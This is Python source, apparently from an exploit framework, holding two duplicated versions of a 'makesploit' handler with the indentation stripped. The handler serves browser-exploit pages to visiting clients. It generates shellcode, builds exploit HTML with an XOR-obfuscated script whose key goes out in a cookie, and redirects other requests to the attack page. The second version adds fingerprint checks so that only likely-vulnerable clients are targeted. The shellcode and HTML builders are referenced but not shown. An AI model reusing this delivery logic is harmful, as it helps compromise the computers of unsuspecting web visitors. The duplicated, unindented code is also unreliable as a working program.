def makesploit(self, clientheader, clientbody):
"""
Called automatically
"""
from libs.spkproxy import header, body
# header is used to store request and reponse headers
header = header('SERVER')
body = body()
if clientheader.URL.count(self.filename):
self.log('Serving HTML file')
# Create the shellcode (self.shellcode)
self.createShellcode()
# Create the HTML Contents
html = self.makefile(request_header=clientheader)
body.setBody(html)
header.addHeader('Content-Type', 'text/html')
header.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('Redirecting to self')
header.status = '302'
header.addHeader('Location', self.filename)
header.addHeader('Content-Type', 'text/html')
return header, body
def makesploit(self, clientheader, clientbody):
from libs.spkproxy import header, body
# header is used to store request and reponse headers
header=header('SERVER')
body=body()
# Clientd gives us a lot of information about the remote endpoint
if self.plugin_info:
# Check if the remote endpoint is vulnerable to our exploit
if self.is_vulnerable(self.plugin_info)==0:
self.log('Bailing on this client as it is not likely to be vulnerable')
#Return a 404 here?
return None,None
if clientheader.URL.count(self.filename):
self.log('%s: Serving HTML file'%self.name)
# Create the shellcode (self.shellcode)
self.createShellcode()
# Create the HTML Contents
html=self.makefile(request_header=clientheader)
if not html:
self.log("%s: Error creating HTML for this exploit"%self.name)
return None, None #done
body.setBody(html)
header.addHeader('Content-Type','text/html')
header.addHeader('Set-Cookie','SessionID=%d'%(self.jsObfuscator.getXORKey()))
else:
self.log('%s: Redirecting to self'%self.name)
header.status='302'
header.addHeader('Location',self.filename)
header.addHeader('Content-Type','text/html')
return header,body